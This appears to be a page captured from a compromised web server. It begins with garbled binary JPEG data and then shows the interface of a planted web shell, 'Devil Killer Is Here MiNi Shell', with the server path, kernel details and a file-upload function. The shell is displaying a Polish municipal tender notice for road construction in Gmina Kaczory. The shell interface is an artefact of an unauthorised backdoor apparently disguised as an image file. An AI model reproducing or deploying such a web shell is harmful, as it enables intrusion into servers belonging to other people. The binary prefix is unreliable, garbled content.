JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220605/0019431201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i przebudowa sieci dróg gminnych w Gminie Kaczory </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO I GMINA KACZORY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791193</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pilska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kaczory</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(+48) 67 284 23 71</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kaczory.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.kaczory.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i przebudowa sieci dróg gminnych w Gminie Kaczory </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5c935d59-e321-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00194312</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.kaczory.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.kaczory.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zamówień Publicznych Urzędu Miasta i<br/>Gminy Kaczory (Platformie ZETO PZP). Wykonawca posiadający konto na Platformie ZETO PZP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z Platformy ZETO PZP”<br/>oraz „Instrukcji obsługi systemu PZP przeznaczoną dla Wykonawcy”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie ZETO PZP tj.:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>- zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji z wyjątkiem Internet Explorer;<br/>- włączona obsługa JavaScript;<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>- podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez<br/>Użytkownika lub aplikacja komputerowa spełniająca funkcje takiego czytnika (tzw. podpis chmurowy).<br/>Za datę przekazania oferty, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania na Platformę ZETO PZP.<br/>Zamawiający przekazuje link do postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na<br/>Liście wszystkich postępowań w Platformie ZETO PZP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2708255,22 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Istniejąca, a przyjęta do budowy droga położona jest w Gminie Kaczory, obręb Jeziorki, na działkach o numerach geodezyjnych 81, 92, 122 i 157/32. Budowa obejmować będzie dwa odcinki drogi oznaczony jako A-A’ i B-B’. Łączna długość obu odcinków wynosi 382,50m. Droga przebiega w terenie częściowo zabudowanym budynkami mieszkalnymi, jednorodzinnymi oraz przy wolnych działkach budowlanych i sadzie.<br/>Stan istniejący<br/>Przyjęta do budowy droga posiada nawierzchnię gruntową z jezdnią o szerokości 3,40 do 5,00m bez ograniczenia. Wzdłuż drogi występują liczne zjazdy do posesji. W pasie drogowym projektowanej drogi występuje infrastruktura i urządzenia techniczne podziemne niezwiązane z gospodarką drogową takie jak: sieć gazowa, wodociągowa, kanalizacja sanitarna, sieć teletechniczna i sieć energetyczna z przyłączami.<br/>Pod względem stopnia skomplikowania warunków gruntowo-wodnych oraz technologii prac, przedmiotowy teren inwestycji mieści się w kategorii prostych warunków gruntowo-wodnych. Zgodnie z treścią Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia <br/>2012r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych, (Dz. U. 2012, poz.463) przedmiotową inwestycję zaliczono do I kategorii geotechnicznej.<br/>Stan projektowany<br/>Projektowana droga składa się z dwóch odcinków nazwanych na potrzeby niniejszego projektu jako A A’ i B-B’. Projektowana długość odcinka A-A’ wynosi 165,0m, a odcinka B-B’ 217,50m. Na połączeniu odcinków (w km 0+006,10 odcinka A-A’) zaprojektowano skrzyżowanie zwykłe pod kątem 78o z obustronnymi wyokrągleniami łukiem poziomym o promieniu R=5m. W km 0+133,50 odcinka A-A’ zaprojektowano kolejne skrzyżowanie zwykłe z istniejącą drogą gminną o nawierzchni z kostki betonowej, również z obustronnymi wyokrągleniami łukiem poziomym o promieniu R=5m. <br/>Projektowana szerokości jezdni odcinka A-A’ wynosi 4,50m, a odcinka B-B’ 5,00m. Spadek poprzeczny jezdni dwustronny, daszkowy 2x2. Wzdłuż obu odcinków, po stronie lewej i prawej, zaprojektowano łącznie 10 zjazdów indywidualnych do posesji. Przy obu odcinkach, obustronnie projektuje się pobocza gruntowe o szerokości 0,75m i spadku poprzecznym, jednostronnym 8% na zewnątrz.<br/>Nawierzchnię jezdni i zjazdów projektuje się ograniczyć obustronnie krawężnikiem betonowym wtopionym o wymiarach 12x25cm, ustawionym na podsypce cementowo-piaskowej 5cm i ławie z oporem wykonanej z betonu cementowego klasy C12/15 w ilości 0,06m3/mb. Jako konstrukcję <br/>nawierzchni jezdni i zjazdów zaprojektowano warstwę kruszywa łamanego stabilizowanego mechanicznie 0/31,5mm o grubości 20cm po zagęszczeniu na warstwie odcinającej z piasku 0/2mm o grubości 10cm po zagęszczeniu. Nawierzchnię jezdni projektuje się wykonać z kostki betonowej, szarej, <br/>typu behaton, grubości 8cm, układanej na podsypce cementowo-piaskowej o grubości 3cm wykonywanej w betoniarkach. Nawierzchnię zjazdów projektuje się wykonać z kostki betonowej, kolorowej, typu behaton, grubości 8cm, układanej na podsypce cementowo-piaskowej o grubości 3cm <br/>wykonywanej w betoniarkach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 524802,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa drogi ul. Lipowej w Zelgniewie <br/>Istniejąca droga gminna – ulica Lipowa posiada jezdnię głównie o nawierzchni gruntowej (z niewielkimi fragmentami umocnionymi brukiem lub gruzem betonowym). Szerokość jezdni waha się od 3.40m do 4.80m. Wzdłuż ulicy występują obustronne pobocza gruntowe, przerośnięte trawą, o szerokości <br/>0,40÷0,80m. Wzdłuż ulicy występuje kilka zjazdów indywidualnych do posesji oraz na pola czy drogi. Szerokość pasa drogowego wynosi 8,0-11,0m. W km 0+381, pod koroną drogi, zlokalizowany jest przepust melioracyjny, rurowy, betonowy o długości 8,0m i średnicy Ø 50cm. Przepust jest bez wody, <br/>stan dobry. W koronie drogi (ulicy), obustronnie, rosną drzewa liściaste. W obrębie pasa drogowego występuje infrastruktura techniczna niezwiązana z gospodarką drogową tj. doziemna sieć wodociągowa, sieć gazowa, sieć kanalizacji sanitarnej oraz naziemna sieć energetyczna. Istniejące sieci <br/>nie kolidują z projektowaną przebudową drogi. Ulica nie posiada oznakowania, kanalizacji deszczowej oraz oświetlenia ulicznego.<br/>Na podstawie wykonanego rozpoznania podłoża gruntowego, pod względem stopnia skomplikowania warunków gruntowo-wodnych, zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie ustalenia geotechnicznych warunków posadowienia obiektów <br/>budowlanych z dnia 25 kwietnia 2012r. (Dz. U. poz. 463), przedmiotowy teren inwestycji mieści się w kategorii prostych warunków gruntowo-wodnych, a pod względem złożoności przedsięwzięcia zalicza się do I kategorii geotechnicznej. Ulica (droga) przenosi ruch wyłącznie lokalny oraz ruch rolniczy związany z obsługą przydrożnych pól. Natężenie ruchu jest bardzo małe. Istniejąca ulica nie posiada oznakowania, odwodnienia (kanalizacji <br/>deszczowej) oraz oświetlenia drogowego. <br/>Stan projektowany<br/>Ulicę zaprojektowano jako jednojezdniową, jednopasmową i dwukierunkową. Klasa techniczna D (dojazdowa). Kategoria ruchu KR 1. Całkowita długość odcinka wynosi 586,0m. Początek przyjęty jako km 0+000, zlokalizowany został na krawędzi jezdni ulicy Lipowej w miejscu zakończenia nawierzchni <br/>asfaltowej. Koniec przyjętego do przebudowy odcinka ulicy przypada w km 0+586 na połączeniu z nawierzchnią asfaltową w obrębie istniejącego skrzyżowania z inną drogą. Projektowany do przebudowy odcinek składa się z jednego odcinka prostego z pięcioma załamaniami trasy pod kątami <br/>od α-0,42o do α-2,14o w km 0+051.10, 0+124.40, 0+168.50, 0+342.40 oraz 0+471.80. Wzdłuż odcinka zaprojektowano łącznie 3 zjazdy, 2 po stronie lewej oraz 1 po stronie prawej jezdni. Projektowana szerokości jezdni wynosi 4,0m. Spadek poprzeczny jezdni dwustronny, daszkowy 2x2%. <br/>Przy jezdni zaprojektowano obustronne pobocze o szerokości 0,50m i spadku poprzecznym jednostronnym 8% na zewnątrz. W celu uniknięcia nadmiernych robót ziemnych oraz dostosowaniem drogi do przyległego terenu, niweletę zaprojektowano głównie przez jej wyniesienie. Maksymalnie <br/>wyniesienie +18cm. Spadki podłużne wahają się od i=0,004 do i=0,039.<br/>Konstrukcję jezdni i zjazdów zaprojektowano bez ograniczenia z warstwy odcinającej z piasku 0/2mm o grubości 10cm, podbudowy z kruszywa łamanego stabilizowanego mechanicznie o grubości warstwy <br/>20cm, skropienia podbudowy emulsją asfaltową w ilości 1,2kg/m2, warstwy wiążącej z betonu asfaltowego KR 1 o grubości 5cm, skropienia warstwy wiążącej emulsją asfaltową w ilości 0,2kg/m2 oraz warstwy ścieralnej z betonu asfaltowego KR 1 o grubości 4cm. Pobocza projektuje się z warstwy <br/>kruszywa łamanego o grubości 10cm po zagęszczeniu.<br/>2) Przebudowa ul. Szybowników w Rzadkowie<br/>Przedmiotem inwestycji jest wykonanie przebudowy ulicy Szybowników w miejscowości Rzadkowo. <br/>Zakres inwestycji:<br/>- Roboty ziemne, <br/>- Wykonanie nowych warstw bitumicznych na istniejącej nawierzchni bitumicznej, <br/>- Wykonanie nowej (pełnej) konstrukcji jezdni na odcinku 0+820,00 – 0+895,00, <br/>- Wymiana nawierzchni istniejącego chodnika z kostki betonowej bezfazowej gr. 8 cm, <br/>- Wymiana nawierzchni istniejących zjazdów indywidualnych z kostki betonowej bezfazowej gr. 8 cm, <br/>- Wykonanie nowych zjazdów publicznych z kostki betonowej bezfazowej gr. 8 cm, <br/>- Wykonanie ścieżki rowerowej o nawierzchni bitumicznej, <br/>- Wykonanie poboczy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm gr. 10 cm, <br/>- Odmulenie i odtworzenie istniejących rowów przydrożnych, <br/>- Humusowanie i obsianie mieszaniną traw skarp i poboczy, <br/>- Przestawienie istniejącej latarni ulicznej, <br/>- Wymiana dwóch istniejących słupów elektroenergetycznych. <br/>Na przedmiotowym terenie zaprojektowano drogę zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie: <br/>- dostępność: - nieograniczona, <br/>- prędkość projektowa w obszarze zabudowanym: - Vp = 40 km/h, <br/>- prędkość projektowa poza obszarem zabudowanym: - Vp = 50 km/h, <br/>- kategoria ruchu: - KR 1 - 2, <br/>- klasa techniczna: - L (lokalna), <br/>- szerokość jezdni: - 5,50 m (5,80 m – na łuku poziomym) <br/>- szerokość poboczy: - 2 x 0,75 m, <br/>- długość projektowanej drogi: - 1.157,92 m, <br/>- szerokość chodnika: - 1,50 – 3,00 m, <br/>- szerokość ścieżki rowerowej: - 2,00 m, <br/>- kategoria obiektu: - XXV.<br/>Projektowa droga położona jest w miejscowości Rzadkowo na terenie gminy Kaczory na działkach ewidencyjnych nr 103/5, 21, 75, 116, 117/13, 117/8, 117/6, 172, 118/2, 520/1, 120/2, 124/2, 522/5, 522/6, 125/2. Początek projektowanej przebudowy przyjęto na skrzyżowaniu z ulicą Powstańców <br/>Wielkopolskich (droga powiatowa nr 1180P), natomiast koniec na granicy działki nr 524. Długość projektowanej trasy wynosi 1.157,92 m. W ramach planowanej przebudowy zaprojektowano wykonanie na istniejącej jezdni bitumicznej nowych warstw bitumicznych o szerokości 5,50 m z <br/>poszerzeniem na łuku poziomym w km 0+692,64 do 5,80 m oraz z poszerzeniem na włączeniu w drogę powiatową nr 1180P. Na odcinku 0+820,00 – 0+895,00 z uwagi na brak podbudowy pod istniejącą <br/>nawierzchnią bitumiczną założono wykonanie nowej pełnej konstrukcji jezdni. Na całym projektowanym odcinku założono wymianę nawierzchni istniejącego chodnika oraz zjazdów na kostkę betonową bezfazową o gr. 8 cm. Zwiększono szerokość chodnika poszerzając go do granic przyległych <br/>posesji – projektowana szerokość chodnika w przedziale 1,50 – 3,00 m. W ramach planowanej przebudowy zaprojektowano nowe zjazdy publiczne komunikujące planowane przyległe drogi wewnętrzne zgodnie z poniższym wykazem: <br/>- km 0+187,00 – str. L, <br/>- km 0+367,67 – str. P, <br/>- km 0+368,13 – str. L, <br/>- km 0+473,15 – str. L, <br/>- km 0+719,25 – str. P, <br/>Na odcinku od km 0+146,00 do skrzyżowania z drogą gminną prowadzącą do DPS po lewej stronie jezdni zaprojektowano ścieżkę rowerową o nawierzchni bitumicznej i szerokość 2,00 m oddaloną od krawędzi jezdni bitumicznej w przedziale 1,00 – 1,60 m. Obramowanie jezdni na odcinku w m. Rzadkowo przyjęto z krawężników betonowych o wym. 15x30 cm oraz 15x22 cm ustawionych na ławie z betonu C 12/15. Obramowanie zjazdów, ścieżki rowerowej i chodnika przyjęto z oporników betonowych o wym. 12x25 cm, oraz obrzeży betonowych o wym. 8x30 cm ustawionych na ławie z betonu C 12/15. Odwodnienie projektowanej drogi zaprojektowano jako powierzchniowe w przyległy teren oraz do istniejących rowów przydrożnych w granicach istniejącego pasa drogowego. W ramach planowanej <br/>inwestycji założono także odmulenie i odtworzenie istniejących rowów odwadniających. W związku z planowaną przebudową zaistniała konieczność przestawienia jednej latarni oświetleniowej, która jest w kolizji z projektowaną ścieżką rowerową. W ramach planowanej przebudowy założono także wymianę dwóch słupów elektroenergetycznych. Projektowaną nawierzchnię zaprojektowano uwzględniając szybkie odprowadzenie wody opadowej przy pomocy projektowanych spadków podłużnych i poprzecznych w przyległy teren oraz do istniejących rowów <br/>odwadniających w granicach działek inwestora. W ramach planowanej inwestycji założono także odmulenie i odtworzenie istniejących rowów odwadniających.<br/>Zestawienie projektowanych powierzchni:<br/>- Nawierzchnia bitumiczna: - 6.600,00 m2<br/>- Pobocza z KŁSM 0/31,5 mm: - 1.640,00 m2<br/>- Nawierzchnia chodników: - 275,00 m2<br/>- Nawierzchnia zjazdów indywidualnych: - 200,00 m2<br/>- Nawierzchnia zjazdów publicznych: - 110,00 m2<br/>- Nawierzchnia ścieżki rowerowej: - 1.520,00 m2 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 2183453,02 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 